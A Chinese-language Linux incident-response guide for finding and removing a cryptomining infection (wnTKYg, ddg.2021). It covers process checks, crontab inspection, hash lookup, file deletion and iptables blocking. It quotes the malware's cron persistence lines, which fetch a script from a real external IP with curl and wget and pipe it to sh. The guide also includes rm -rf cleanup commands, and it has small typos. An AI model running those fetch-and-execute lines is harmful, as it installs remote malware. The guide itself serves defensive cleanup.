挖矿病毒排查

一 异常进程排查

一、# 进程动态快速定位，使用 top -c可快速定位异常常常的物理位置，查询异常进程。
二、# top -c
三、# ps -ef 排查
四、# ps -ef |grep wnTKYg
五、# ps -ef |grep ddg.2021
六、# 疑似进程定位
七、[root@localhost ~]# find / -name wnTKYg*
      /tmp/wnTKYg

二 计划任务查询

一、[root@localhost ~]# crontab -l

1. /5 * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh

2. /5 * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

三 异常病毒校验

一、# md5sum wnTKYg

d3b1700a413924743caab1460129396b wnTKYg

二、进行疑似病毒MD5哈希值的校验比对

直接将疑似文件wnTKYg的md5哈希值复制到病毒校验网站https://www.virustotal.com/#search进行查询比对。经过比对结果，咱们能够确认疑似文件是不是恶意程序。

四  处理恶意程序

一、清除计划任务

# crontab -r # 直接使用此命令便可上次当前用户的计划任务

或者 [root@VM_11_13_centos ~]# cd /var/spool/cron/
        [root@VM_11_13_centos cron]# vim root  而后删除计划任务。

# crontab -l # 直接查询当前用户是否还存在计划任务

二、#pkill wnTKYg

     # pkill dgg.2021

三、清除恶意进程

# rm -rf /tmp/ddg.2021

# rm -rf /tmp/wnTKYg

# rm -rf /tmp/i.sh

五 下发访问控制策略，禁止服务互联三个恶意程序外联的外网地址

一、查询恶意进程外网互联地址

 # netstat -pantul |grep ESTAB
 tcp 0 0 192.168.31.9:22 192.168.31.75:3898 ESTABLISHED 3742/sshd
 tcp 0 0 192.168.31.9:56842 163.172.226.120:443 ESTABLISHED 7263/wnTKYg
 tcp 0 0 192.168.31.9:22 192.168.31.75:3953 ESTABLISHED 3795/sshd
 tcp 0 0 192.168.31.9:35286 104.131.231.181:8443 ESTABLISHED 7193/ddg.2021
 tcp 0 0 192.168.31.9:55200 218.248.40.228:8443 ESTABLISHED 6339/curl

二、下发放控制策略，禁止服务的外网互联

# iptables -A OUTPUT -d 163.172.226.120 -j DROP

# iptables -A OUTPUT -d 104.131.231.181 -j DROP# iptables -A OUTPUT -d 218.248.40.228 -j DROP